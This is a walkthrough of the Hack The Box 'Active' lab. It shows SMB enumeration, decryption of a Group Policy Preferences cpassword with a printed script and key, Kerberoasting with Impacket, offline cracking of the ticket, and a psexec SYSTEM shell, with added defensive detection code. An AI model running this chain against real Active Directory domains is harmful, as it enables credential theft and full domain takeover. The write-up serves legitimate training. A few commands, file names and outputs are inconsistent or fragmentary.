Today we are going to solve another CTF challenge, “Active”. Active is a retired vulnerable lab presented by Hack the Box to help pentesters perform online penetration testing according to their experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.

Level: Easy

Task: To find user.txt and root.txt file

Let’s start off with nmap command to find out the open ports and services.

root@kali:~/htb/active# nmap -sC -sV -oA nmap 10.10.10.100
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-12 09:37 EST
Stats: 0:00:30 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 70.59% done; ETC: 09:38 (0:00:05 remaining)
Nmap scan report for 10.10.10.100
Host is up (0.030s latency).
Not shown: 983 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2018-12-12 14:35:12Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -2m50s, deviation: 0s, median: -2m50s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2018-12-12 09:36:09
|_ start_date: 2018-12-09 21:48:35

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 169.48 seconds

As you can observe from the Nmap results, there are many open ports and services: the OS is Microsoft Windows Server 2008 R2 SP1 (the DNS, Kerberos and LDAP services indicate a domain controller), and the LDAP banner reveals the domain name “active.htb”.

Enumeration
root@kali:~/htb/active# smbclient -L //10.10.10.100
Enter WORKGROUP\root's password:
Anonymous login successful

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available
Then I checked the share permissions with smbmap and accessed the Replication share with smbclient, both through the anonymous account:

root@kali:~/htb/active# smbmap -H 10.10.10.100
[+] Finding open SMB ports….
[+] User SMB session establishd on 10.10.10.100…
[+] IP: 10.10.10.100:445 Name: 10.10.10.100
Disk Permissions
---- -----------
ADMIN$ NO ACCESS
C$ NO ACCESS
IPC$ NO ACCESS
NETLOGON NO ACCESS
Replication READ ONLY
SYSVOL NO ACCESS
Users NO ACCESS
root@kali:~/htb/active# smbclient //10.10.10.100/Replication
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as GPT.INI (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as GPE.INI (1.0 KiloBytes/sec) (average 0.6 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as GptTmpl.inf (9.8 KiloBytes/sec) (average 3.7 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (4.2 KiloBytes/sec) (average 3.8 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as Registry.pol (25.2 KiloBytes/sec) (average 7.9 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as GPT.INI (0.2 KiloBytes/sec) (average 6.7 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as GptTmpl.inf (26.7 KiloBytes/sec) (average 10.1 KiloBytes/sec)
smb: \> SMBecho failed (NT_STATUS_CONNECTION_RESET). The connection is disconnected now
root@kali:~/htb/active# smbmap -R Replication -H 10.10.10.100 -A Groups.xml -q
[+] Finding open SMB ports….
[+] User SMB session establishd on 10.10.10.100…
[+] IP: 10.10.10.100:445 Name: 10.10.10.100
Disk Permissions
---- -----------
Replication READ ONLY
[+] Starting search for files matching 'Groups.xml' on share Replication.
[+] Match found! Downloading: Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml
Here I downloaded the Groups.xml file and located it on disk:
root@kali:~/htb/active# locate Groups.xml
/usr/share/smbmap/10.10.10.100-Replication_active.htb_Policies_{31B2F340-016D-11D2-945F-00C04FB984F9}_MACHINE_Preferences_Groups_Groups.xml
root@kali:~/htb/active# cat /usr/share/smbmap/10.10.10.100-Replication_active.htb_Policies_{31B2F340-016D-11D2-945F-00C04FB984F9}_MACHINE_Preferences_Groups_Groups.xml

So here I found a cpassword attribute value embedded in Groups.xml for the user SVC_TGS. GPP encrypts that value with AES, but the key is published by Microsoft (the MSDN link in the script’s comments), so anyone who can read SYSVOL can recover the password.
I therefore downloaded the Python script “Gpprefdecrypt” from GitHub, which decrypts the passwords of local users added via Windows 2008 Group Policy Preferences (GPP), and obtained the password: GPPstillStandingStrong2k18

root@kali:/usr/share/smbmap# cat Gpprefdecrypt.py
#!/usr/bin/env python3
#
# Gpprefdecrypt - Decrypt the password of local users added via Windows 2008 Group Policy Preferences.
#
# This tool decrypts the cpassword attribute value embedded in the Groups.xml file stored in the domain controller's Sysvol share.
# (Ported here from the original Python 2 script to Python 3; requires pycryptodome: pip install pycryptodome)
#

import sys
from base64 import b64decode
from Crypto.Cipher import AES

if len(sys.argv) != 2:
    print("Usage: gpprefdecrypt.py <cpassword>")
    sys.exit(0)

# Init the key
# From MSDN: http://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be%28v=PROT.13%29#endNote2
# This 32-byte AES-256 key is public, which is why every cpassword value is recoverable by anyone who can read the XML.
key = bytes.fromhex(
    "4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8 "
    "f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b"
)

# Add padding to the base64 string and decode it (GPP strips the trailing '=' characters)
cpassword = sys.argv[1]
cpassword += "=" * ((4 - len(cpassword) % 4) % 4)
password = b64decode(cpassword)

# Decrypt the password: AES-CBC with an all-zero IV
o = AES.new(key, AES.MODE_CBC, b"\x00" * 16).decrypt(password)

# Strip the PKCS#7 padding (the last byte gives the pad length) and decode the UTF-16LE plaintext
print(o[:-o[-1]].decode("utf-16-le"))
Let’s decrypt the cpassword attribute:
root@kali:/usr/share/smbmap# python gpppdecrypt.py edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
Access Victim’s Shell via SMB connect and Privilege Escalation
In the Nmap results we saw port 88 open for Kerberos, so there may be Service Principal Names (SPNs) associated with normal user accounts. We therefore downloaded and installed Impacket from GitHub to use its Python scripts, first GetADUsers.py to enumerate the domain users and then GetUserSPNs.py.

root@kali:~/htb/active# python GetADUsers.py -all -dc-ip 10.10.10.100 active.htb/svc_tgs
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

Password:
[*] Querying 10.10.10.100 for information about domain.
Name Email PasswordLastSet LastLogon
-------------------- ------------------------------ ------------------- -------------------
Administrator 2018-07-18 15:06:40 2018-07-30 13:17:40
Guest
krbtgt 2018-07-18 14:50:36
SVC_TGS 2018-07-18 16:14:38 2018-12-10 01:17:54

root@kali:~/htb/active# python psexec.py active.htb/svc_tgs@10.10.10.100
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

Password:
[*] Requesting shares on 10.10.10.100…..
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'Replication' is not writable.
[-] share 'SYSVOL' is not writable.
[-] share 'Users' is not writable.
root@kali:~/htb/active# smbmap -d active.htb -u svc_tgs -p GPPstillStandingStrong2k18 -H 10.10.10.100
[+] Finding open SMB ports….
[+] User SMB session establishd on 10.10.10.100…
[+] IP: 10.10.10.100:445 Name: 10.10.10.100
Disk Permissions
---- -----------
ADMIN$ NO ACCESS
C$ NO ACCESS
IPC$ NO ACCESS
NETLOGON READ ONLY
Replication READ ONLY
SYSVOL READ ONLY
Users READ ONLY
root@kali:~/htb/active# smbmap -d active.htb -u svc_tgs -p GPPstillStandingStrong2k18 -H 10.10.10.100 -R Users
[+] Finding open SMB ports….
[+] User SMB session establishd on 10.10.10.100…
[+] IP: 10.10.10.100:445 Name: 10.10.10.100
Disk Permissions
---- -----------
Users READ ONLY
.\
dw–w–w– 0 Sat Jul 21 10:39:20 2018 .
dw–w–w– 0 Sat Jul 21 10:39:20 2018 ..
dr–r–r– 0 Mon Jul 16 06:14:21 2018 Administrator
dr–r–r– 0 Mon Jul 16 17:08:56 2018 All Users
dw–w–w– 0 Mon Jul 16 17:08:47 2018 Default
dr–r–r– 0 Mon Jul 16 17:08:56 2018 Default User
-r–r–r– 174 Mon Jul 16 17:01:17 2018 desktop.ini
dw–w–w– 0 Mon Jul 16 17:08:47 2018 Public
dr–r–r– 0 Sat Jul 21 11:16:32 2018 SVC_TGS
.\\Default\
dw–w–w– 0 Mon Jul 16 17:08:47 2018 .
dw–w–w– 0 Mon Jul 16 17:08:47 2018 ..
dr–r–r– 0 Mon Jul 16 17:08:47 2018 AppData
dr–r–r– 0 Mon Jul 16 17:08:56 2018 Application Data
dr–r–r– 0 Mon Jul 16 17:08:56 2018 Cookies
dw–w–w– 0 Mon Jul 16 17:08:47 2018 Desktop
dw–w–w– 0 Mon Jul 16 17:08:47 2018 Documents
dw–w–w– 0 Mon Jul 16 17:08:47 2018 Downloads
–snip–
.\\SVC_TGS\Desktop\
dr–r–r– 0 Sat Jul 21 11:14:42 2018 .
dr–r–r– 0 Sat Jul 21 11:14:42 2018 ..
-r–r–r– 34 Sat Jul 21 11:14:42 2018 user.txt

Switch to Windows
c:\users\jacco>runas /netonly /user:active.htb\svc_tgs cmd
[on that runas prompt -> ]
C:\Windows\system32>dir \\10.10.10.100\Users
Volume in drive \\10.10.10.100\Users has no label.
Volume Serial Number is 2AF3-72E4

Directory of \\10.10.10.100\Users

21/07/2018 11:14 <DIR> Administrator
14/07/2009 05:57 <DIR> Public
21/07/2018 16:16 <DIR> SVC_TGS
0 File(s) 0 bytes
5 Dir(s) 20.147.937.280 bytes free

C:\Windows\system32>type \\10.10.10.100\Users\SVC_TGS\Desktop\user.txt
86d*****e983
PS C:\Users\jacco> Test-NetConnection -Computername 10.10.10.100 -Port 389

ComputerName : 10.10.10.100
RemoteAddress : 10.10.10.100
RemotePort : 389
InterfaceAlias : Ethernet 2
SourceAddress : 10.10.14.19
TcpTestSucceeded : True
Sharphound
Kerberoasting

Kerberos is a protocol for authentication used in Windows Active Directory environments (though it can be used for auth to Linux hosts as well). In 2014, Tim Medin presented an attack on Kerberos he called Kerberoasting. https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-%20Tim%20Medin(1).pdf It’s worth reading through the presentation, as Tim uses good graphics to illustrate the process, but I’ll try to give a simple overview.

When you want to authenticate to some service using Kerberos, you contact the DC and tell it which service you want to authenticate to. It sends you back a service ticket encrypted with a key derived from the service account’s password hash. You send that ticket to the service, which can decrypt it with its own password, check who you are, and decide if it wants to let you in.

In a Kerberoasting attack, rather than sending the encrypted ticket from the DC to the service, you keep it and use an offline brute-force attack to crack the password of the service account it was encrypted with. The DC never sees the cracking attempts, so the only events on the server side are the ticket requests themselves.
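The ticket exchange just described leaves a trace on the DC: every service-ticket request is logged as Security event 4769, including the encryption type used. The block below is an added example (my code, not part of the original post) showing a minimal detection over constructed 4769 records, simplified to key=value lines. The field names are the real 4769 fields (TargetUserName, ServiceName, TicketEncryptionType, IpAddress); the svc_sql/svc_http accounts and the addresses are made up. It flags RC4 tickets (0x17, the etype 23 that John later reports) issued for user-type service accounts, and a single requester that pulls such tickets for several services, which is what a GetUserSPNs -request run looks like from the defender's side.

```python
"""Spot Kerberoasting-style activity in Windows Security event 4769 records.

Added example for this write-up; the events are constructed samples in a
simplified key=value form rather than real EVTX/XML output.
"""
from collections import defaultdict

RC4_HMAC = 0x17  # TicketEncryptionType for RC4-HMAC, i.e. Kerberos etype 23

# Constructed sample events. 0x12 is AES256-CTS-HMAC-SHA1-96, 0x17 is RC4-HMAC.
# svc_tgs asking for RC4 tickets to three different service accounts mirrors
# the GetUserSPNs -request run in this post (the Administrator account holds
# the active/CIFS:445 SPN).
SAMPLE_EVENTS = [
    "EventID=4769 TargetUserName=svc_tgs@ACTIVE.HTB ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=10.10.14.19",
    "EventID=4769 TargetUserName=svc_tgs@ACTIVE.HTB ServiceName=Administrator TicketEncryptionType=0x17 IpAddress=10.10.14.19",
    "EventID=4769 TargetUserName=svc_tgs@ACTIVE.HTB ServiceName=svc_sql TicketEncryptionType=0x17 IpAddress=10.10.14.19",
    "EventID=4769 TargetUserName=svc_tgs@ACTIVE.HTB ServiceName=svc_http TicketEncryptionType=0x17 IpAddress=10.10.14.19",
    "EventID=4769 TargetUserName=jdoe@ACTIVE.HTB ServiceName=DC$ TicketEncryptionType=0x12 IpAddress=10.10.10.50",
    "EventID=4769 TargetUserName=svc_sql@ACTIVE.HTB ServiceName=svc_sql TicketEncryptionType=0x17 IpAddress=10.10.10.60",
]


def parse_event(line):
    """Parse one key=value event line into a dict; the etype becomes an int."""
    fields = dict(tok.split("=", 1) for tok in line.split())
    fields["TicketEncryptionType"] = int(fields["TicketEncryptionType"], 16)
    return fields


def is_roastable_request(ev):
    """RC4 service ticket for a user-type service account.

    krbtgt (the TGT itself) and machine accounts (name ends in '$', long
    random passwords) are excluded: they are not practical cracking targets.
    """
    svc = ev["ServiceName"]
    return (ev["EventID"] == "4769"
            and ev["TicketEncryptionType"] == RC4_HMAC
            and svc.lower() != "krbtgt"
            and not svc.endswith("$"))


def detect_kerberoasting(lines, threshold=3):
    """Return (weak_etype_requests, burst_alerts).

    weak_etype_requests: every RC4 ticket issued for a user-type service
        account, as (requester, service account, source IP) tuples. Each one
        names a service account whose password must be long, or which should
        be moved to AES-only encryption types.
    burst_alerts: requesters that obtained RC4 tickets for at least
        `threshold` distinct service accounts, mapped to the sorted list of
        those accounts.
    """
    weak = []
    per_requester = defaultdict(set)
    for line in lines:
        ev = parse_event(line)
        if is_roastable_request(ev):
            weak.append((ev["TargetUserName"], ev["ServiceName"], ev["IpAddress"]))
            per_requester[ev["TargetUserName"]].add(ev["ServiceName"])
    bursts = {user: sorted(svcs) for user, svcs in per_requester.items()
              if len(svcs) >= threshold}
    return weak, bursts


if __name__ == "__main__":
    weak, bursts = detect_kerberoasting(SAMPLE_EVENTS)
    for requester, service, ip in weak:
        print("RC4 service ticket: %s -> %s from %s" % (requester, service, ip))
    for user, services in bursts.items():
        print("possible Kerberoasting by %s: %s" % (user, ", ".join(services)))
```

The threshold is deliberately simple; in a real environment legacy clients still request RC4 tickets, so the per-service list is better used to drive a baseline (which accounts legitimately get RC4 tickets, from which hosts) than as a stand-alone alert.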
Switch to Kali
root@kali:~/htb/active# python GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/svc_tgs
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
-------------------- ------------- -------------------------------------------------------- ------------------- -------------------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40 2018-07-30 13:17:40

$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$d4e64efb7b7b843205406be1ea8ff311$8a6247145ea4e39fb6c85ab3a24a4c0a386aa824e39d554d6257b4f89d567bc0a01ca9ba5799e2de159fb09db2da1f7ab3df7753c4a05fb2c652ea60087dda97752207a1a7b9442a2f51dfc9483f1511f52f781c8eea77dbe8cc7d53246500cfb1dc499347e333cb32d66b0dba14a4f4f5abef8e07d1e5af65b4af2a95df0ef93a4b174ab5e6fa11096fac4dfb7c5fce97843f2d7878f0f4365cba42c539851ac2630ffebcf76f8d53400edea23244b9afa18c1a951b73e52f424a2cbe99ca46a05fc9642b41617fc4aff0f383c7b2b345c51817ff68da95e49e2ecc29aa2d129e26e9a3fc9d2c3326ffc827a540ae0bc097220b8537da3485922d74d97a0ff467d247f626ad872ed84ffbba8f237d81cffa780b8e0d27d09b7a2ffd0a6fdfa8cd93aee833f9633e3c5421b31639e1a1423c1147d2398c97252bb4e2ab38cdd055a331cf58ff95f8cf29bc6d3193bdec3ca5cfe8d50f90a7e6ac879cdc3c119a3e6babaa29c8656d4a4686edd88c2648dca386df1270053bde9e1ab67b648385b69a8807fd00850849cb1be23f8750104bb0abc2f1afaaeff9de225c8c7ddc771b69a7127dea8406610f53584c7c3d548b4e35c101e000b66cbe74d3a87bb20cc832a8396893a294428d30f749b507f03511628a3872648e2fa795d838dd6c289afcc4b4c5982e9ecefeec1c2c0755c94c6a6becca54fb54420bd50a6e4acafa5d9b8f44b74c1cb6e99399344a558c0acd43efa57b318d3a6a3239234faa780a207e6fc477afbe26fe40c8d400669a96febd77505214d5d74b6e30e13ad2992bb2c707ba1310991809c9cc84816192888b6590faab811a372880791df50669bb8527f8c0f965744ebace544d6d97b9ff0b02aa47070c5a4f8786c7a86e8dd580887bb96febee28c164a72cc4e7c403e591bc4b397aa326190ea6713876102aa3210bf1e447b03daa6dfb655ca1ef2832d11b31cfd80f6f06c9a1365a7bcf353c9f729d384b92c66923a42cd901fc2ac8a3cb65c698587eaf17fb5eabb97e3829a840f0f254ff432bc6d1ad68fc7340a895cf2cf6cb0160f50d6d12e2f001d16943d851880da2344300e09d44d72f2018408b6bbc0bc877f3299a560ba5ea62879c1872954a6e774d82292b1adfcac7d9bc17240fd71d4059bf9cc511ddee381521cb8a1b48b8d7dc21f4b1375c10475f924a3308bd22e35471fa6126342240492dabeccc95bd7f617ae91e8965679cfaef4e042482653a505d2a
Here we see that before requesting the TGS for a particular SPN, Impacket makes an Authentication Server Request (AS_REQ) and the server responds with a TGT for the SVC_TGS account. Note that the TGT (encrypted with the krbtgt key) doesn’t use the same encryption type as the TGS that follows.

Then Impacket makes a TGS request that includes the TGT. Finally, the server responds with a TGS, and Impacket formats it as a krb5tgs hash, which is recognized by John the Ripper (JTR) and hashcat (HC).

$krb5tgs$$*$$*$$
Now that we have a TGS, we can try to recover the service account’s password by cracking it offline. If you run Kali, you will need to follow these steps to build the jumbo version of JTR so that it recognizes the format.
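From the defender’s side, the GetUserSPNs table above is an inventory of Kerberoastable accounts: Administrator carries the SPN active/CIFS:445, sits in Group Policy Creator Owners, and, as the etype 23 hash shows, was issued an RC4 ticket. The block below is an added example (my code, not the post’s or Impacket’s) that scores that exposure from constructed account records mirroring the table. The attribute names are real AD attributes (servicePrincipalName, memberOf, msDS-SupportedEncryptionTypes, pwdLastSet), but the svc_web and DC$ rows and SCAN_DATE are made up.

```python
"""Rank user accounts with SPNs by Kerberoasting exposure.

Added example for this write-up; SAMPLE_ACCOUNTS is constructed data shaped
like LDAP results, not output from the lab.
"""
from datetime import datetime, timedelta

# msDS-SupportedEncryptionTypes bit flags (MS-KILE). On a 2008 R2 era DC an
# unset attribute on a user account means service tickets are issued with
# RC4, which is exactly what produced the $krb5tgs$23$ hash in this post.
RC4_HMAC = 0x4
AES128 = 0x8
AES256 = 0x10

PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators",
                     "Group Policy Creator Owners", "Account Operators"}

SCAN_DATE = datetime(2018, 12, 12)  # constructed reference point (date of the write-up's scan)

# Constructed sample accounts keyed by AD attribute name.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "Administrator",           # mirrors the GetUserSPNs table
     "servicePrincipalName": ["active/CIFS:445"],
     "memberOf": ["CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb"],
     "msDS-SupportedEncryptionTypes": None,
     "pwdLastSet": datetime(2018, 7, 18, 15, 6, 40)},
    {"sAMAccountName": "SVC_TGS",                 # no SPN: not roastable
     "servicePrincipalName": [],
     "memberOf": [],
     "msDS-SupportedEncryptionTypes": None,
     "pwdLastSet": datetime(2018, 7, 18, 16, 14, 38)},
    {"sAMAccountName": "svc_web",                 # made up: SPN, but AES-only and recently rotated
     "servicePrincipalName": ["HTTP/web.active.htb"],
     "memberOf": [],
     "msDS-SupportedEncryptionTypes": AES128 | AES256,
     "pwdLastSet": datetime(2018, 12, 1)},
    {"sAMAccountName": "DC$",                     # made up: machine account, random 120-char password
     "servicePrincipalName": ["ldap/dc.active.htb"],
     "memberOf": [],
     "msDS-SupportedEncryptionTypes": AES256,
     "pwdLastSet": datetime(2018, 12, 9)},
]


def group_cn(dn):
    """'CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb' -> 'Group Policy Creator Owners'."""
    return dn.split(",", 1)[0].split("=", 1)[1]


def allows_rc4(enc_types):
    """Unset attribute falls back to RC4; otherwise test the RC4 bit."""
    return enc_types is None or bool(enc_types & RC4_HMAC)


def audit_spn_exposure(accounts, now, max_age_days=365):
    """Return findings for user accounts with SPNs, highest score first.

    Score: +3 if RC4 tickets can be issued, +3 if the account is in a
    privileged group (a cracked password is then a domain compromise, as in
    this lab), +2 if the password is older than max_age_days. Machine
    accounts are skipped: their passwords are random and rotate automatically.
    """
    findings = []
    for acct in accounts:
        name = acct["sAMAccountName"]
        if not acct["servicePrincipalName"] or name.endswith("$"):
            continue
        reasons, score = [], 0
        if allows_rc4(acct["msDS-SupportedEncryptionTypes"]):
            reasons.append("RC4 allowed (etype 23 tickets)")
            score += 3
        priv = {group_cn(g) for g in acct["memberOf"]} & PRIVILEGED_GROUPS
        if priv:
            reasons.append("privileged: " + ", ".join(sorted(priv)))
            score += 3
        if now - acct["pwdLastSet"] > timedelta(days=max_age_days):
            reasons.append("password older than %d days" % max_age_days)
            score += 2
        findings.append({"account": name, "spns": acct["servicePrincipalName"],
                         "score": score, "reasons": reasons})
    return sorted(findings, key=lambda f: f["score"], reverse=True)


if __name__ == "__main__":
    for f in audit_spn_exposure(SAMPLE_ACCOUNTS, now=SCAN_DATE):
        print(f["score"], f["account"], f["spns"], "; ".join(f["reasons"]))
```

The remediation each reason points at is the usual one: remove SPNs from privileged accounts (or move the service to a group Managed Service Account), set msDS-SupportedEncryptionTypes to AES-only so no etype 23 ticket is ever issued, and give any remaining service account a long random password.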

root@kali:# git clone https://github.com/magnumripper/JohnTheRipper.git && cd JohnTheRipper/src
root@kali:/opt/JohnTheRipper/src# ./configure
checking build system type… x86_64-unknown-linux-gnu
checking host system type… x86_64-unknown-linux-gnu
checking whether to compile using MPI… no
checking for gcc… gcc
checking whether the C compiler works… yes
checking for C compiler default output file name… a.out
–snip–
config.status: linking x86-64.h to arch.h
config.status: executing default commands
configure: creating ./fmt_externs.h
configure: creating ./fmt_registers.h

Configured for building John the Ripper jumbo:

Target CPU …………………………… x86_64 SSE4.2, 64-bit LE
AES-NI support ……………………….. depends on OpenSSL
Target OS ……………………………. linux-gnu
Cross compiling ………………………. no
Legacy arch header ……………………. x86-64.h

Optional libraries/features found:
Memory map (share/page large files) …….. yes
Fork support …………………………. yes
OpenMP support ……………………….. yes (not for fast formats)
OpenCL support ……………………….. yes
Generic crypt(3) format ……………….. yes
libgmp (PRINCE mode and faster SRP formats) yes
128-bit integer (faster PRINCE mode) ……. yes
libz (pkzip and some other formats) …….. yes
libbz2 (gpg2john extra decompression logic) no
libpcap (vncpcap2john and SIPdump) ……… no
librexgen (regex cracking mode) ………… no
OpenMPI support (default disabled) ……… no
ZTEX USB-FPGA module 1.15y support ……… no

Install missing libraries to get any needed features that were omitted.

Configure finished. Now “make -s clean && make -sj4” to compile.

root@kali:/opt/JohnTheRipper/src# make -s clean && make -sj4
ar: creating aes.a
ar: creating ed25519-donna.a
ar: creating secp256k1.a
scrypt_fmt.c: In function ‘get_binary’:
scrypt_fmt.c:246:2: warning: ‘strncpy’ specified bound 256 equals destination size [-Wstringop-truncation]
strncpy(out, ciphertext, sizeof(out)); /* NUL padding is required */
^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
In function ‘pad100’,
inlined from ‘dynamic_pad100’ at dynamic_compiler.c:607:52:
dynamic_compiler.c:569:34: warning: ‘strncpy’ output may be truncated copying 100 bytes from a string of length 127 [-Wstringop-truncation]
static char *pad100() { strncpy(gen_conv, gen_pw, 100); return gen_conv; } /* NUL padding is required */
^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
In function ‘pad20’,
inlined from ‘dynamic_pad20’ at dynamic_compiler.c:606:52:
–snip–
In file included from /usr/include/CL/cl.h:36,
from opencl_common.h:26,
from opencl_DES_bs.h:13,
from opencl_DES_fmt_plug.c:22:
/usr/include/CL/cl_version.h:34:9: note: #pragma message: cl_version.h: CL_TARGET_OPENCL_VERSION is not defined. Defaulting to 220 (OpenCL 2.2)
#pragma message(“cl_version.h: CL_TARGET_OPENCL_VERSION is not defined. Defaulting to 220 (OpenCL 2.2)”)
^~~~~~~

Make process completed.
cd ../run && ./john --test
$ ./john --wordlist=/usr/share/wordlists/rockyou.txt tgs.txt # DON'T use --format=krb5tgs
And then, voilà

root@kali:/opt/JohnTheRipper/run# ./john --wordlist=/usr/share/wordlists/rockyou.txt admin.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:09 11.70% (ETA: 05:32:24) 0g/s 205994p/s 205994c/s 205994C/s dmrdlcrz..dlh622
0g 0:00:00:36 52.01% (ETA: 05:32:17) 0g/s 209321p/s 209321c/s 209321C/s hotheaven1..hotgirl2008
Ticketmaster1968 (?)
1g 0:00:00:49 DONE (2018-12-13 05:31) 0.02014g/s 212277p/s 212277c/s 212277C/s Tiffani1432..Tiago_18
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Or crack the hash with hashcat (mode 13100 is Kerberos 5 TGS-REP etype 23)
c:\PENTEST\hashcat>hashcat64.exe --force -m 13100 hashes.txt rockyou.txt
hashcat (v5.1.0) starting…

GoforIT
root@kali:~/htb/active# python psexec.py active.htb/Administrator@10.10.10.100
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

Password:
[*] Requesting shares on 10.10.10.100…..
[*] Found writable share ADMIN$
[*] Uploading file kdkWjbGn.exe
[*] Opening SVCManager on 10.10.10.100…..
[*] Creating service ujlu on 10.10.10.100…..
[*] Starting service ujlu…..
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

Author: Jacco Straathof
